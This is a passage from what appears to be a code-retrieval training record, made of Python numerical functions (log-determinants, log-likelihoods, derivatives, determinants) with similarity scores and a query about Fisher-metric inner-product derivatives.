log_det.append(tf.reduce_sum(tf.math.log(tf.math.real(evals))))\n log_det = tf.convert_to_tensor(log_det)\n return tf.expand_dims(log_det, -1)", "def fast_logdet(matrix):\n sign, ld = np.linalg.slogdet(matrix)\n if not sign > 0:\n return -np.inf\n return ld", "def log_den(self, X):\n raise NotImplementedError()", "def logtomo(self, psi):\n return -1j / self.wavenumber() * self.mlog(psi) / self.voxelsize", "def log_entropy(dm):\n size = len(dm)\n entropy = 0\n w, v = np.linalg.eig(dm)\n for n in range(size):\n if w[n] != 0:\n entropy = entropy - w[n] * np.log2(w[n])\n return entropy", "def _log_det_observation_precision(self):\n num_data = self.prior_ssm.num_transitions + 1\n return tf.cast(num_data, default_float()) * tf.linalg.logdet(self._r_inv)", "def __dNdlog2dN(self,Dp,dNdlogDp):\n \n x = np.log10(Dp)\n y = (x[1:]+x[:-1])/2.\n y = np.pad(y,1,'constant',constant_values=(x[0]-(y[0]-x[0]),x[-1]+(x[-1]-y[-1])))\n dlogDp = np.diff(y)\n return dNdlogDp*dlogDp # cm-3", "def log_likelihood(self):\r\n if self.likelihood.is_heteroscedastic:\r\n A = -0.5 * self.num_data * self.output_dim * np.log(2.*np.pi) + 0.5 * np.sum(np.log(self.likelihood.precision)) - 0.5 * np.sum(self.likelihood.V * self.likelihood.Y)\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision.flatten() * self.psi0) - np.trace(self._A))\r\n else:\r\n A = -0.5 * self.num_data * self.output_dim * (np.log(2.*np.pi) - np.log(self.likelihood.precision)) - 0.5 * self.likelihood.precision * self.likelihood.trYYT\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision * self.psi0) - np.trace(self._A))\r\n C = -self.output_dim * (np.sum(np.log(np.diag(self.LB)))) # + 0.5 * self.num_inducing * np.log(sf2))\r\n D = 0.5 * self.data_fit\r\n self._A_part, self._B_part, self._C_part, self._D_part = A, B, C, D\r\n return A + B + C + D + self.likelihood.Z", "def log2(tensor):\n return log(tensor, base=2)", "def log_sum_exp(x, dim=0):\n max_x = torch.max(x, dim)[0]\n new_x = x - max_x.unsqueeze(dim).expand_as(x)\n return max_x + (new_x.exp().sum(dim)).log()", "def _core_calc_degrad(self,bd,Ld) :\n\t\tdegrad = np.dot(Ld,bd) # Do matrix multiplication \n\t\tdegrad = np.exp(degrad) # Exponentiate to convert log to real\n\t\treturn degrad", "def grad_log(self, X):\n g = autograd.elementwise_grad(self.log_den)\n G = g(X)\n return G", "def _loglike(self, y, f):\n ll = y * tf.log(pos(f)) + (1 - y) * tf.log(pos(1 - f))\n return ll", "def logpdf(self, X) -> np.ndarray:\n return self.dist.logpdf(self.inv_trans(X))", "def dvdlogdp(self):\n return self.dndlogdp.mul(self.v_multiplier)", "def log2(a):", "def _compute_logarithmic_distance_term(index, M, Rhypo):\r\n return ((a4[index] + a5 * (M - c1)) * np.log(np.sqrt(Rhypo**2. + a6**2.)))", "def _smw_logdet(s, A, AtA, B, BI, B_logdet):\n\n p = A.shape[0]\n\n if _no_smw or BI is None:\n mat = np.dot(A, np.dot(B, A.T))\n # Add constant to diagonal\n mat.flat[::p+1] += s\n _, ld = np.linalg.slogdet(mat)\n return ld\n\n ld = p * np.log(s)\n\n qmat = BI + AtA / s\n _, ld1 = np.linalg.slogdet(qmat)\n\n return B_logdet + ld + ld1", "def logaddexp(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n return torch.max(x, y) + torch.log(1 + torch.exp(-torch.abs(y - x)))", "def log_distr_fdmwz(self, dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=None):\n flux = np.power(10., logflux)\n logl = np.log10(self.cos.Luminosity(z, f=flux, dnu=dnu))\n logint1 = self.log_IntBeam(logl, alpha, logls, logl0)\n #print logint1\n logw0 = logw - np.log10(1+z)\n logfw = self.log_dis_logw(logw0, mu, sigma)\n logfz = self.log_Distribution_volume(z)\n dmi = self.cos.DispersionMeasure_IGM(z)\n u1 = (dme-dmi)*(1+z)*self.kappa(z)\n u2 = ((dme-dmi)*(1+z)-self.DMsmax)*self.kappa(z)\n #print u2\n logint2 = np.ones(u2.shape) * (-1e99)\n ind = u2 > 0\n logint2[ind] = self.log_IntDMsrc(u1[ind],u2[ind],gtype=gtype)\n #print logint2\n loglikv = logint1 + logfz + logfw + logint2 + np.log(1+z)\n return loglikv", "def toeplitz_slogdet(r):\n n = len(r)\n r_0 = r[0]\n \n r = np.concatenate((r, np.array([r_0])))\n r /= r_0 # normalize the system so that the T matrix has diagonal of ones\n \n logdet = n*np.log(np.abs(r_0))\n sign = np.sign(r_0)**n\n \n if n == 1:\n return (sign, logdet)\n \n # now on is a modification of Levinson algorithm\n y = zeros((n,))\n x = zeros((n,))\n\n b = -r[1:n+1] \n r = r[:n]\n \n y[0] = -r[1]\n x[0] = b[0]\n beta = 1\n alpha = -r[1]\n \n d = 1 + dot(-b[0], x[0])\n sign *= np.sign(d)\n logdet += np.log(np.abs(d))\n \n for k in range(0,n-2):\n \n beta = (1 - alpha*alpha)*beta\n mu = (b[k+1] - dot(r[1:k+2], x[k::-1])) /beta\n x[0:k+1] = x[0:k+1] + mu*y[k::-1]\n x[k+1] = mu\n \n d = 1 + dot(-b[0:k+2], x[0:k+2])\n sign *= np.sign(d)\n logdet += np.log(np.abs(d))\n \n if k < n-2:\n alpha = -(r[k+2] + dot(r[1:k+2], y[k::-1]))/beta\n y[0:k+1] = y[0:k+1] + alpha * y[k::-1]\n y[k+1] = alpha \n\n return(sign, logdet)", "def shannon(state_space):\n if isinstance(state_space, int) or len(state_space) == 1:\n return 0\n ws = sum(state_space.values())\n if ws == 0:\n print(state_space)\n return math.log(ws) - sum(map(lambda x: x * math.log(x), state_space.values())) / ws", "def log_distr_fdmw(self, dnu, logflux, dme, logw, alpha, logls, logl0, mu, sigma, gtype=None):\n #stepdms = 100/1000.\n #vdms = np.arange(0, 100, stepdm)\n stepz = (np.log(self.Zmax) - np.log(self.Zmin)) / 1000\n vz = np.exp(np.arange(np.log(self.Zmin), np.log(self.Zmax), stepz))\n lik = 0\n for z in vz:\n likv = np.exp(self.log_distr_fdmwz(dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=gtype))\n lik += z * stepz * likv\n ind = lik > 0\n ind2 = lik <= 0\n loglik = lik.copy()\n loglik[ind] = np.log(lik[ind])\n loglik[ind2] = np.ones(loglik[ind2].shape) * -1e99\n return loglik", "def _xlogx(x):\n y = x.copy()\n if isinstance(y, sparse.csc_matrix) or isinstance(y, sparse.csr_matrix):\n z = y.data\n else:\n z = np.asarray(y) # ensure np.matrix converted to np.array\n nz = z.nonzero()\n z[nz] *= np.log2(z[nz])\n return y", "def Log(A, B):\n return logm(inv(A).dot(B))", "def log(self, base):\n\n\t\tvalues = map(lambda x: x > 0, self.val)\n\t\tif not all(values):\n\t\t\traise ValueError(\"Non-positive number encountered in log.\")\n\t\telse:\n\t\t\tval = np.array([np.math.log(v, base) for v in self.val])\n\t\t\tif len(self.der.shape):\n\t\t\t\tto_multiply = 1 / np.multiply(np.log(base), self.val)\n\t\t\t\tto_multiply = np.expand_dims(to_multiply, 1) if len(self.der.shape) > len(to_multiply.shape) else to_multiply\n\t\t\t\tder = np.multiply(to_multiply, self.der)\n\t\t\telse:\n\t\t\t\tder = None\n\t\treturn Var(val, der)", "def my_loglike(theta, x, data, sigma):\n\n model = my_model(theta, x)\n\n return -0.5*len(x)*np.log(2*math.pi*sigma**2) - (0.5/sigma**2) * np.sum((data-model)**2)", "def NormLog(self,X,Y,parameterValues, independentValues):\n lgX = numpy.log10(X)\n D = numpy.around(lgX[1] - lgX[0],2)\n bins = 10**(lgX+D/2.) - 10**(lgX-D/2.)\n return Y/sum(Y*bins)", "def dfdx(self, X):\n \n return 3*(X[0])**2", "def evaluate(self, data):\n d = log(-log(data))\n return dot(d, self._sampling_matrix.T)", "def logintdim():\n dim = Integer(\"yolo5\", \"reciprocal\", 1, 10, shape=(3, 2))\n return dim", "def loglf2py(store):\n loglike=0.0\n return loglinear.logl(store['xb'],store['xmatf'], store['beta'],store['yvec'],loglike)", "def dlogdp(self):\n return np.log10(self.bins[:, -1]) - np.log10(self.bins[:, 0])", "def make_ln_func(variable):\n def safe_ln_queryset(qs):\n \"\"\"Takes the natural log of a queryset's values and handles zeros\"\"\"\n vals = qs.values_list(variable, flat=True)\n ret = np.log(vals)\n ret[ret == -np.inf] = 0\n return ret\n return safe_ln_queryset", "def logistic(self,w,Xi):\n # print(w.T)\n # print(Xi)\n a = np.dot(w.T,Xi)\n return 1/(1+np.exp(-a))", "def log2_inplace(a):", "def __pow__(self, a: float) -> np.ndarray:\n return np.e**(a*self.logarithm)", "def _forward_log_det_jacobian(self, x):\n d = self._compute_shared(x=x)\n relx = (x - d.x_k) / d.w_k\n relx = relx # tf.where(d.out_of_bounds, 0.5*tf.ones_like(x), relx)\n grad = (\n 2 * tf.math.log(d.s_k) +\n tf.math.log(d.d_kp1 * relx**2 + 2 * d.s_k * relx * (1 - relx) + # newln\n d.d_k * (1 - relx)**2) -\n 2 * tf.math.log((d.d_kp1 + d.d_k - 2 * d.s_k) * relx *\n (1 - relx) + d.s_k))\n return grad # tf.where(d.out_of_bounds, tf.zeros_like(grad), grad)", "def d1(self):\n f = (self.rf + (self.sigma ** (2)) / 2 ) * self.t\n return (1/(self.sigma * (self.t ** (0.5)))) *(math.log(self.s/self.x) + f)", "def ln(x):\n return log(x, const.e)", "def log10(self):\n return Factor().__build( VarSet(self.v) , np.log10(self.t) )", "def rms_db(self):\n mean_square = np.mean(self._samples ** 2, axis=0)\n return 10 * np.log10(mean_square)", "def logTF(self, tf):\n return math.log(tf)", "def logsumexp_trick(sum_term):\n max_term = np.max(sum_term)\n return max_term + np.log(np.sum(np.exp(sum_term-max_term)))", "def loglnumpy(store):\n xbeta = dot(store['xmat'], store['beta'])\n lamb = exp(xbeta)\n return sum(store['yvec'] * xbeta - lamb)", "def invwish_logpdf(X, S, df):\n d = X.shape[0]\n if df < d:\n raise ValueError('df must be greater than or equal to the number of '\n ' dimensions of S')\n if d != X.shape[1]:\n raise ValueError('X must be square.')\n if S.shape[0] != d or S.shape[1] != d:\n raise ValueError('S must be the same shape as X.')\n\n _, logdet_S = slogdet(S)\n _, logdet_X = slogdet(X)\n\n logpdf = (df/2)*logdet_S - ((df*d/2)*log(2) + multigammaln(df/2, d))\n logpdf += (-(d+df+1)/2)*logdet_X - (1/2)*trace(solve(X.T, S.T))\n\n return logpdf", "def log_sum_exp(x):\n x_max = x.data.max()\n return torch.log(torch.sum(torch.exp(x - x_max), 1, keepdim=True)) + x_max", "def log_sum_exp(x):\n x_max = x.data.max()\n return torch.log(torch.sum(torch.exp(x - x_max), 1, keepdim=True)) + x_max", "def log_gaussian_density(x, mu, L):\n\n D = x.shape[-1]\n # print(\"x shape:\", x.shape)\n # print(\"mu shape:\", mu.shape)\n # print(\"L shape:\", L.shape)\n\n a = np.linalg.solve(L, x - mu) # (..., K)-array\n\n logp = - 0.5 * D * np.log(2.0 * np.pi) - np.sum(np.log(np.diagonal(L))) \\\n - 0.5 * np.sum(a**2.0, axis=-1) # (...)-array; sums only the dimension of the Gaussian vector\n\n return logp", "def log_det_precisions(self):\n return tf.math.log(-2 * self.nat2)", "def _compute_logarithmic_distance_term(index, M, Rjb):\r\n return ((a4[index] + a5 * (M - c1)) * np.log(np.sqrt(Rjb**2. + a6**2.)))", "def log_sum_exp(x):\n x_max = x.max()\n return torch.log(torch.sum(torch.exp(x - x_max), 1, keepdim=True)) + x_max", "def logaddexp(a, b):\n\n return torch.logsumexp(torch.cat([a.unsqueeze(0), b.unsqueeze(0)]), dim=0)", "def loglike(self, params, *args, **kwargs):\n return np.sum(self.loglikeobs(params, *args, **kwargs))", "def transform(self, original_input):\n return super(LogarithmicDimension, self).transform(np.log(original_input))", "def _perplexity(self, X, log_w):\n return np.exp(-log_w/X.sum())" ]
[ "0.63612115", "0.63412535", "0.6210124", "0.6097916", "0.60911155", "0.60809803", "0.60428435", "0.60420275", "0.6025387", "0.601383", "0.6008682", "0.59616804", "0.5944786", "0.5878604", "0.5871771", "0.5864707", "0.5863798", "0.58423436", "0.5829568", "0.5821031", "0.58171713", "0.5810316", "0.58041775", "0.58039594", "0.58027786", "0.5800487", "0.5799734", "0.5787852", "0.5780669", "0.5744475", "0.5741872", "0.573417", "0.573417", "0.57227004", "0.57214165", "0.57200384", "0.5713018", "0.56938565", "0.56644064", "0.56517124", "0.5640531", "0.56333643", "0.5633108", "0.562467", "0.561968", "0.56007946", "0.5591083", "0.5588046", "0.55837387", "0.55803317", "0.55723727", "0.5561702", "0.55573493", "0.5553427", "0.55376756", "0.5530476", "0.55185986", "0.5512506", "0.55112284", "0.54985183", "0.5486627", "0.54847246", "0.54734707", "0.5468933", "0.546597", "0.5462672", "0.5450029", "0.54452", "0.5441352", "0.54401386", "0.5431462", "0.54314446", "0.5430311", "0.539911", "0.5392924", "0.5391323", "0.53893274", "0.53833187", "0.53824526", "0.53789526", "0.53748006", "0.53648853", "0.53553706", "0.535064", "0.53452533", "0.5341926", "0.5326479", "0.5320955", "0.5319334", "0.5314673", "0.530881", "0.530881", "0.5296916", "0.5296761", "0.52964616", "0.5295292", "0.529452", "0.52912754", "0.5285184", "0.5282467" ]
0.6198977
3
r"""Compute the derivative of the innerproduct matrix. Compute the derivative of the innerproduct matrix of the Fisher information metric at the tangent space at base point.
def inner_product_derivative_matrix(self, base_point): def pdf(x): """Compute pdf at a fixed point on the support. Parameters ---------- x : float, shape (,) Point on the support of the distribution """ return lambda point: self.information_manifold.point_to_pdf(point)(x) def _function_to_integrate(x): pdf_x = pdf(x) pdf_x_at_base_point = pdf_x(base_point) pdf_x_derivative = gs.autodiff.jacobian(pdf_x) pdf_x_derivative_at_base_point = pdf_x_derivative(base_point) return ( 1 / (pdf_x_at_base_point**2) * ( 2 * pdf_x_at_base_point * gs.einsum( "...ij, ...k -> ...ijk", gs.autodiff.jacobian(pdf_x_derivative)(base_point), pdf_x_derivative_at_base_point, ) + gs.einsum( "...i, ...j, ...k -> ...ijk", pdf_x_derivative_at_base_point, pdf_x_derivative_at_base_point, pdf_x_derivative_at_base_point, ) ) ) return quad_vec(_function_to_integrate, *self.support)[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def integrability_tensor_derivative(\n self,\n horizontal_vec_x,\n horizontal_vec_y,\n nabla_x_y,\n tangent_vec_e,\n nabla_x_e,\n base_point,\n ):\n raise NotImplementedError", "def derivatives(x_p, y_p):\r\n # set up the matrix equation\r\n n = x_p.shape[0]\r\n M = np.zeros( [n,n] )\r\n d = np.zeros( [n,1] )\r\n \r\n # fill in the constants where they can be\r\n for i in np.arange(1,n-1 ): # for all but the first and last row\r\n M[i,i-1 ] = ( x_p[i] - x_p[i-1] ) / 6.\r\n M[i,i] = ( x_p[i+1] - x_p[i-1] ) / 3.\r\n M[i,i+1] = ( x_p[i+1] - x_p[i] ) /6.\r\n d[i,0 ] = ( y_p[i+1] - y_p[i] ) / ( x_p[i+1] - x_p[i] ) - ( y_p[i] - y_p[i-1] ) / ( x_p[i] - x_p[i-1] )\r\n \r\n M[0,0],M[-1,-1] = 1.,1. # compactly sets the BCs\r\n \r\n LU = lu.LU_decomp(M) # solves the matrix equations\r\n return lu.FB_sub(LU.Low, LU.Upp, d) # find and return 2nd derivatives\r", "def gather_derivatives(self):\n self.xdot[0,0:self.n] = self.mdot[0:self.n] \n self.xdot[1,0:self.n] = self.rdot[0:self.n,0]\n self.xdot[2,0:self.n] = self.rdot[0:self.n,1]\n self.xdot[3,0:self.n] = self.rdot[0:self.n,2]\n self.xdot[4,0:self.n] = self.vdot[0:self.n,0]\n self.xdot[5,0:self.n] = self.vdot[0:self.n,1]\n self.xdot[6,0:self.n] = self.vdot[0:self.n,2]\n return self.xdot", "def dE_mdn(self, x, y, t, w1 = None, w2 = None):\n if w2 == None:\n w2 = self.w2\n M = int(self.M)\n # avoid underrun\n \n alpha, sigma, mu = self.getMixtureParams(y.T)\n #import pdb; pdb.set_trace()\n \n #T = t.T[None, None, :] # note: np.tile is slower than this notation\n T = t.T[None, :]\n \n phi = self._phi(T, mu, sigma)\n aphi = alpha*phi\n pi = aphi / np.sum(aphi, 0)\n \n # derivatives of E with respect to the output variables (s. Bishop 1995, chp. 6.4)\n dE_dy_alpha = alpha - pi\n dE_dy_sigma = - 0.5 * pi * ((np.sum((T-mu)**2 , 1) / sigma) - self.c)\n dE_dy_mu = pi[:,np.newaxis,:] * (mu - T) / sigma[:,np.newaxis,:]\n\n dk = np.zeros([self.ny, x.shape[0]])\n dk[0:M,:] = dE_dy_alpha\n dk[M:2*M,:] = dE_dy_sigma\n \n dk[2*M:] = np.reshape(dE_dy_mu, [M*self.c, x.shape[0]])\n \n # back-propagate the dks\n #t0=datetime.now()\n dEnw1, dEnw2 = self.backward(x, dk, None, w2)\n #print 'eval of dE_mdn:' + str((datetime.now()-t0))\n #dj = (1 - self.z[1:]**2) * np.dot(w2[:,1:].T, dk)\n # evaluate derivatives with respect to the weights\n #dEnw1 = (dj[:,:,np.newaxis]*x[np.newaxis,:,:]).transpose(1,0,2)\n #dEnw2 = (dk[:,:,np.newaxis]*self.z.T[np.newaxis,:,:]).transpose(1,0,2)\n return dEnw1, dEnw2", "def gather_derivatives(self):\n self.xdot[0,0:self.n] = self.mdot[0:self.n] \n self.xdot[1,0:self.n] = self.rdot[0:self.n,0]\n self.xdot[2,0:self.n] = self.rdot[0:self.n,1]\n self.xdot[3,0:self.n] = self.rdot[0:self.n,2]\n self.xdot[4,0:self.n] = self.vdot[0:self.n,0]\n self.xdot[5,0:self.n] = self.vdot[0:self.n,1]\n self.xdot[6,0:self.n] = self.vdot[0:self.n,2]\n self.xdot[7,0:self.n] = self.rhodot[0:self.n] \n self.xdot[8,0:self.n] = 0\n self.xdot[9,0:self.n] = 0\n self.xdot[10,0:self.n] = self.udot[0:self.n]\n return self.xdot", "def _derX(self, x, y):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n i = self.argcompare(temp, axis=1)\n dfdx = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdx[c] = self.functions[j].derivativeX(x[c], y[c])\n return dfdx", "def _2ndderiv_xyz(self,x,y,z,i,j):\n return -np.pi*self._rhoc_M*self.a**3*self._b*self._c *\\\n _2ndDerivInt(x,y,z,self._a2,self._b2*self._a2,self._c2*self._a2,self.n,i,j)", "def __call__ ( self , func , x , h , der = False ) :\n\n ## calculate differences \n imax = self.__order + 2 if der else self.__order + 1\n i = 0\n while i < imax : \n j = i + 1\n self.__df[i] = func ( x + j * h ) - func ( x - j * h )\n i += 1\n \n ## 1) calculate 1st derivative \n result = dot_fma ( self.__order + 1 , self.__df , self.__d1 ) / ( self.__sf1 * h ) \n if not der : return result \n \n ## 2) calculate Nth derivative \n dd = dot_fma ( self.__order + 2 , self.__df , self.__d2 ) / ( self.__sf2 * h**(self.__order*2+3) ) \n \n return result, dd", "def _derY(self, x, y):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n i = self.argcompare(temp, axis=1)\n y = temp[np.arange(m), i]\n dfdy = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdy[c] = self.functions[j].derivativeY(x[c], y[c])\n return dfdy", "def det(self):\n if self.x == 0 or self.y == 0:\n return None\n elif self.x == 1 or self.y == 1:\n return self.retrieve(0,0)\n else:\n out = 0.0\n for x in xrange(0, self.x):\n out += self.retrieve(0,x)*self.C(0,x)\n return out", "def determinant(self):\n if not self.is_square():\n raise(ValueError, \"Cannot calculate determinant of non-square matrix.\")\n if self.h > 2:\n raise(NotImplementedError, \"Calculating determinant not implemented for matrices largerer than 2x2.\")\n\n # TODO - your code here\n if self.h == 1:\n return self.g[0][0] # a 1x1 matrix\n else:\n return ((self.g[0][0] * self.g[1][1]) - (self.g[0][1] * self.g[1][0])) # a 2x2 matrix\n # TODO - your code here", "def _2ndderiv_xyz(self, x, y, z, i, j):\n return (\n 4.0\n * numpy.pi\n * self._b\n * self._c\n * _2ndDerivInt(\n x,\n y,\n z,\n lambda m: self._mdens(m),\n lambda m: self._mdens_deriv(m),\n self._b2,\n self._c2,\n i,\n j,\n glx=self._glx,\n glw=self._glw,\n )\n )", "def derivative_matrix(g):\n\n def _(g):\n B = g.B[0].grad\n N = g.N[0]\n P = g.dec.P(1)\n H = np.vstack(P(B(i)) for i in range(N)).T\n return H\n\n return _(g), _(g.dual)", "def determinant(self):\n if not self.is_square():\n raise(ValueError, \"Cannot calculate determinant of non-square matrix.\")\n if self.h > 2:\n raise(NotImplementedError, \"Calculating determinant not implemented for matrices largerer than 2x2.\")\n \n # TODO - your code here\n if self.h == 1:\n return self.g[0][0];\n else:\n return self.g[0][0]*self.g[1][1]-self.g[0][1]*self.g[1][0];", "def det2(m):\n\t(a,b), (c,d) = m\n\treturn a*d - b*c", "def compute_derivs_matrices(vecs, adv_vecs, dt):\n return (adv_vecs - vecs)/(1.*dt)", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def derivative(self, theta):\n diag_gamma = np.dot(theta.T, self.X.T)\n logistic_term = self.logistic_fn(diag_gamma)\n diag_gamma = logistic_term * (1.0 - logistic_term)\n gamma = np.diag(diag_gamma)\n\n # v computation\n diags_v = 1.0 - 2*self.logistic_fn(np.dot(theta.T, self.X.T))\n diags_v = diags_v.reshape((-1, 1))\n diags_v = diags_v*self.X\n assert diags_v.shape == self.X.shape #N*d shape\n\n XtGamma = np.dot(self.X.T, gamma) # d*N shape\n\n # TODO: Verifier car pas sur de mon coup ... et surtout plus long...\n # id = np.eye(self.n_examples).reshape((self.n_examples, self.n_examples, 1))\n # diags_v = diags_v.reshape((self.n_examples, 1, self.dim))\n # v = id*diags_v # n*n*d tensor\n # left = np.tensordot(XtGamma, v, axes=(1, 0)) # shape d*N*d\n # assert left.shape == (self.dim, self.n_examples, self.dim)\n # dg = np.tensordot(left, self.X, axes=(1, 0))\n # dg = np.swapaxes(dg, axis1=-2, axis2=-1)\n\n dg = np.zeros((self.dim, self.dim, self.dim))\n for idx, v_i_diag in enumerate(diags_v.T):\n v_i = np.diag(v_i_diag)\n dg_di = np.dot(np.dot(XtGamma, v_i), self.X)\n dg[:, :, idx] = dg_di\n return dg", "def derv(self, t, y):\n x = y[0];\n xc = y[1];\n n = y[2];\n\n Bhat = self.G * (1.0 - n) * self.alpha0(t) * (1 - 0.4 * x) * (1 - 0.4 * xc);\n\n dydt = np.zeros(3)\n\n dydt[0] = sp.pi / 12.0 * (xc + Bhat);\n dydt[1] = sp.pi / 12.0 * (self.mu * (xc - 4.0 / 3.0 * pow(xc, 3.0)) - x * (\n pow(24.0 / (0.99669 * self.taux), 2.0) + self.kparam * Bhat));\n dydt[2] = 60.0 * (self.alpha0(t) * (1.0 - n) - self.delta * n);\n\n return (dydt)", "def calc_derivative(self, array_in, direction1, direction2 = False):\r\n A = array_in.copy()\r\n if direction1 != direction2:\r\n #Remove Nyquist frequency for even sample size and odd order of differentiation\r\n if direction1 == 'x' or direction2 == 'x':\r\n A[0,:] = 0.0\r\n if direction1 == 'y' or direction2 == 'y':\r\n A[:,0] = 0.0\r\n\r\n # Note that 'x' corresponds to the x1 direction, and 'y' to the\r\n # x2 direction\r\n # Perform first derivative in desired direction\r\n if direction1 == 'x':\r\n out = self.deriv_mat_x1*A\r\n elif direction1 == 'y':\r\n out = self.deriv_mat_x2*A\r\n\r\n # Perform second derivative in desired direction\r\n if direction2 == 'x':\r\n out = self.deriv_mat_x1*out\r\n elif direction2 == 'y':\r\n out = self.deriv_mat_x2*out\r\n\r\n return out", "def determinant(self):\n if self.n_rows != self.n_cols:\n raise Exception('Matrix is not square')\n if self.n_rows == 2:\n return (self.data[0][0] * self.data[1][1]) - (self.data[1][0] * self.data[0][1])\n else:\n echelon, ops = reduce_to_echelon(self.data.copy(), True)\n swaps = sum([1 if row[0] == 'swap' else 0 for row in ops])\n return math.prod([echelon[i][i] for i in range(len(echelon))]) * (-1) ** swaps", "def _dy(self, T):\n return self._h(np.diff(T)) * self._a / self._m / self._c * np.diff(T) * np.array([1, -1])", "def diffuse_2d(t,y,D,shape):\n m,n = shape\n Fliq0 = np.reshape(np.ascontiguousarray(y),(m,n))\n dy = np.zeros((m,n))\n\n # Calculate derivatives in the interior\n dy[1:-1, 1:-1] = (\n D * (Fliq0[:-2, 1:-1] - 2 * Fliq0[1:-1, 1:-1] + Fliq0[2:, 1:-1])\n + D * (Fliq0[1:-1, :-2] - 2 * Fliq0[1:-1, 1:-1] + Fliq0[1:-1, 2:])\n )\n # Handle periodic boundary conditions\n #Edges\n dy[0, 1:-1] = (\n D * (Fliq0[-1, 1:-1] - 2 * Fliq0[0, 1:-1] + Fliq0[1, 1:-1])\n + D * (Fliq0[0, :-2] - 2 * Fliq0[0, 1:-1] + Fliq0[0, 2:])\n )\n dy[-1, 1:-1] = (\n D * (Fliq0[-2, 1:-1] - 2 * Fliq0[-1, 1:-1] + Fliq0[0, 1:-1])\n + D * (Fliq0[-1, :-2] - 2 * Fliq0[-1, 1:-1] + Fliq0[-1, 2:])\n )\n dy[1:-1, 0] = (\n D * (Fliq0[:-2, 0] - 2 * Fliq0[1:-1, 0] + Fliq0[2:, 0])\n + D * (Fliq0[1:-1, -1] - 2 * Fliq0[1:-1, 0] + Fliq0[1:-1, 1])\n )\n dy[1:-1, -1] = (\n D * (Fliq0[:-2, -1] - 2 * Fliq0[1:-1, -1] + Fliq0[2:, -1])\n + D * (Fliq0[1:-1, -2] - 2 * Fliq0[1:-1, -1] + Fliq0[1:-1, 0])\n )\n #Corners\n dy[0, 0] = (\n D * (Fliq0[-1, 0] - 2 * Fliq0[0, 0] + Fliq0[1, 0])\n + D * (Fliq0[0, -1] - 2 * Fliq0[0, 0] + Fliq0[0, 1])\n )\n dy[-1, 0] = (\n D * (Fliq0[-2, 0] - 2 * Fliq0[-1, 0] + Fliq0[0, 0])\n + D * (Fliq0[-1, -1] - 2 * Fliq0[-1, 0] + Fliq0[-1, 1])\n )\n dy[0, -1] = (\n D * (Fliq0[-1, -1] - 2 * Fliq0[0, -1] + Fliq0[1, -1])\n + D * (Fliq0[0, -2] - 2 * Fliq0[0, -1] + Fliq0[0, 0])\n )\n dy[-1, -1] = (\n D * (Fliq0[-2, -1] - 2 * Fliq0[-1, -1] + Fliq0[0, -1])\n + D * (Fliq0[-1, -2] - 2 * Fliq0[-1, -1] + Fliq0[-1, 0])\n )\n\n return dy.flatten()", "def det(self):\n\n if self.rows != self.columns:\n raise ValueError(\"Matrix must be square\")\n\n if self.rows == 1:\n return self.row(1)[0]\n\n if self.rows == 2:\n return self.entry(1,1) * self.entry(2,2) - self.entry(1,2) * self.entry(2,1)\n\n det = 0\n row_to_expand = 1\n\n for i in range(1, self.columns + 1):\n det += self.entry(row_to_expand, i) * self._cofactor(row_to_expand, i)\n\n return det", "def determinant(self):\n d1 = self._row_1[0] * (self._row_2[1] * self._row_3[2] - self._row_2[2] * self._row_3[1])\n d2 = self._row_1[1] * (self._row_2[0] * self._row_3[2] - self._row_2[2] * self._row_3[0])\n d3 = self._row_1[2] * (self._row_2[0] * self._row_3[1] - self._row_2[1] * self._row_3[0])\n return d1 - d2 + d3", "def _derY(self, x, y, z):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n i = self.argcompare(temp, axis=1)\n y = temp[np.arange(m), i]\n dfdy = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdy[c] = self.functions[j].derivativeY(x[c], y[c], z[c])\n return dfdy", "def two_body_problem_derivatives(t, y):\n # E = compute_energy_of_twobodysystem(y)\n # positions\n ra = np.array([y[0:3]])\n rb = np.array([y[3:6]])\n # separation\n r_ab = rb - ra\n deltar = np.linalg.norm(r_ab)\n # accelerations\n rdotdota = Mb * r_ab / (deltar ** 3)\n rdotdotb = - Ma * r_ab / (deltar ** 3)\n # rewrite in column form\n ret = np.concatenate((np.array(y[6:]),rdotdota,rdotdotb), axis=None)\n return ret", "def det(v_i, v_j):\n return (v_i[0] * v_j[1]) - (v_j[0] * v_i[1])", "def det(v_i, v_j):\n return (v_i[0] * v_j[1]) - (v_j[0] * v_i[1])", "def derivative_func(t, x, Approx_func):\n return x.dot(Approx_func)", "def _derZ(self, x, y, z):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n i = self.argcompare(temp, axis=1)\n y = temp[np.arange(m), i]\n dfdz = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdz[c] = self.functions[j].derivativeZ(x[c], y[c], z[c])\n return dfdz", "def GetDerivative(self, *args):\n return _ITKCostFunctionsPython.itkMultipleValuedCostFunction_GetDerivative(self, *args)", 